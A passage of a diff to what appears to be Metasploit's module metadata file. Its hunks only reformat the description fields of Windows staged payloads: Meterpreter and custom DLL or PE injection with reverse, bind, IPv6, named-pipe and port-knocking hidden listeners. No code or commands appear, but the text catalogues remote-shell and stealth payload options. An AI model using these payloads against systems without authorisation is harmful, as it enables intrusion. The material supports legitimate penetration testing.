      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199022,7 +199587,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199060,7 +199625,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows wininet)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199100,7 +199665,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "amaloteaux <alex_maloteaux@metasploit.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP using SSL with custom proxy support",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP using SSL with custom proxy support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199138,7 +199703,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker over IPv6",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199175,7 +199740,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199213,7 +199778,7 @@
      "OJ Reeves",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (No NX)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199251,7 +199816,7 @@
      "OJ Reeves",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199289,7 +199854,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199327,7 +199892,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199366,7 +199931,7 @@
      "hdm <x@hdm.io>",
      "RageLtMan"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199406,7 +199971,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199446,7 +200011,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199484,7 +200049,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199523,7 +200088,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199562,7 +200127,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows winhttp)",
+    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -199886,7 +200451,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -199924,7 +200489,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -199961,7 +200526,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -199999,7 +200564,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -200035,7 +200600,7 @@
      "skape <mmiller@hick.org>",
      "UserExistsError"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -200071,7 +200636,7 @@
      "skape <mmiller@hick.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection (No NX)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -200108,7 +200673,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -200147,7 +200712,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection",
    "references": [

    ],
@@ -200184,7 +200749,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -200219,7 +200784,7 @@
      "jt <jt@klake.org>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Use an established connection",
+    "description": "Inject a custom DLL into the exploited process.\n\nUse an established connection",
    "references": [

    ],
@@ -200256,7 +200821,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -200292,7 +200857,7 @@
      "skape <mmiller@hick.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -200328,7 +200893,7 @@
      "skape <mmiller@hick.org>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200365,7 +200930,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200402,7 +200967,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject a custom DLL into the exploited process.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -200440,7 +201005,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200479,7 +201044,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200518,7 +201083,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200555,7 +201120,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -200593,7 +201158,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -200631,7 +201196,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -200668,7 +201233,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -200706,7 +201271,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -200742,7 +201307,7 @@
      "jt <jt@klake.org>",
      "UserExistsError"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -200778,7 +201343,7 @@
      "jt <jt@klake.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection (No NX)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -200815,7 +201380,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -200854,7 +201419,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -200891,7 +201456,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -200926,7 +201491,7 @@
      "skape <mmiller@hick.org>",
      "jt <jt@klake.org>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Use an established connection",
+    "description": "Inject the meterpreter server DLL (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -200963,7 +201528,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -200999,7 +201564,7 @@
      "jt <jt@klake.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -201035,7 +201600,7 @@
      "jt <jt@klake.org>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201072,7 +201637,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201109,7 +201674,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -201147,7 +201712,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201186,7 +201751,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201225,7 +201790,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201262,7 +201827,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -201300,7 +201865,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
    "references": [

    ],
@@ -201338,7 +201903,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -201375,7 +201940,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -201413,7 +201978,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -201448,7 +202013,7 @@
      "ege <egebalci@pm.me>",
      "UserExistsError"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a pipe connection (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -201483,7 +202048,7 @@
      "ege <egebalci@pm.me>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection (No NX)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (No NX)",
    "references": [

    ],
@@ -201520,7 +202085,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -201559,7 +202124,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection",
    "references": [

    ],
@@ -201595,7 +202160,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -201630,7 +202195,7 @@
      "ege <egebalci@pm.me>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Use an established connection",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nUse an established connection",
    "references": [

    ],
@@ -201667,7 +202232,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
